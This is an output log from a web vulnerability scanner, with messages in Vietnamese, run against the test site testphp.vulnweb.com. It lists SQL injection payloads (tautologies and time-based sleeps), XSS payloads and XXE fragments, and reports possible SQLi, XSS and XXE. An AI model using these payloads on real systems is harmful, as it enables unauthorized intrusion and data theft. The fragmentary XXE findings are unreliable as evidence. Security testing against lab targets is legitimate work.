[TIME] 2025-07-24 23:50:40
[URL] http://testphp.vulnweb.com/cart.php
[SUMMARY] SQLi, XSS, XXE
======= SQLi =======
[*] Đang kiểm tra SQL Injection trên: http://testphp.vulnweb.com/cart.php
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công SQLi với các payloads:
    - searchFor=' OR '1'='1
    - goButton=' OR '1'='1
    - searchFor=" OR "1"="1
    - goButton=" OR "1"="1
    - goButton=') OR ('1'='1
    - searchFor=" OR 1=1 --
    - goButton=" OR 1=1 --
    - searchFor=' OR 1=1#
    - goButton=' OR 1=1#
    - searchFor=" OR 1=1#
    - goButton=" OR 1=1#
    - searchFor=admin' --
    - goButton=admin' --
    - searchFor=1' or '1' = '1
    - goButton=1' or '1' = '1
    - searchFor=' AND 1=1 --
    - goButton=' AND 1=1 --
    - searchFor=' AND 1=2 --
    - goButton=' AND 1=2 --
    - searchFor=" AND 1=1 --
    - goButton=" AND 1=1 --
    - searchFor=" AND 1=2 --
    - goButton=" AND 1=2 --
    - searchFor=') AND '1'='1
    - goButton=') AND '1'='1
    - searchFor=') AND '1'='2
    - goButton=') AND '1'='2
    - searchFor=" OR "" = "
    - goButton=" OR "" = "
    - searchFor=' OR '' = '
    - goButton=' OR '' = '
    - searchFor='; WAITFOR DELAY '0:0:5' --
    - goButton='; WAITFOR DELAY '0:0:5' --
    - searchFor='; SELECT pg_sleep(5)--
    - goButton='; SELECT pg_sleep(5)--
    - searchFor=" OR SLEEP(5) --
    - goButton=" OR SLEEP(5) --
    - searchFor=') OR SLEEP(5) --
    - goButton=') OR SLEEP(5) --
    - searchFor=" OR 1=1; SLEEP(5) --
    - goButton=" OR 1=1; SLEEP(5) --
    - searchFor=admin' OR SLEEP(3)--
    - goButton=admin' OR SLEEP(3)--
    - searchFor=1); SELECT sleep(5);--
    - goButton=1); SELECT sleep(5);--


======= XSS =======
[*] Đang kiểm tra XSS trên: http://testphp.vulnweb.com/cart.php
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công XSS với các payloads:
    - <details open ontoggle=alert(7)>
    - "><img src=x onerror=alert(2)>
    - <script>alert(1)</script>
    - <iframe src="javascript:alert(5)">
    - '><svg/onload=alert(3)>
    - <marquee onstart=alert(8)>
    - <video src=1 onerror=alert(9)>
    - <math href="javascript:alert(6)">
    - "><svg onmouseover=alert(4)>


======= LFI =======
[*] Đang kiểm tra LFI trên: http://testphp.vulnweb.com/cart.php
[✓] Không phát hiện lỗ hổng LFI.


======= CMDi =======
[*] Đang kiểm tra Command Injection trên: http://testphp.vulnweb.com/cart.php
[✓] Không phát hiện lỗ hổng CMDi.


======= XXE =======
[*] Đang kiểm tra XXE trên: http://testphp.vulnweb.com/cart.php
[!] Lỗi khi gửi request: HTTPConnectionPool(host='testphp.vulnweb.com', port=80): Read timed out. (read timeout=7)
[!] Lỗi khi gửi request: HTTPConnectionPool(host='testphp.vulnweb.com', port=80): Read timed out. (read timeout=7)
[!] Lỗi khi gửi request: HTTPConnectionPool(host='testphp.vulnweb.com', port=80): Read timed out. (read timeout=7)
[!] Lỗi khi gửi request: HTTPConnectionPool(host='testphp.vulnweb.com', port=80): Read timed out. (read timeout=7)
[!] Có thể bị tấn công XXE với các payloads:
    - <?xml version="1.0" ?>
    - <foo>&xxe;</foo>
    - <foo>test</foo>


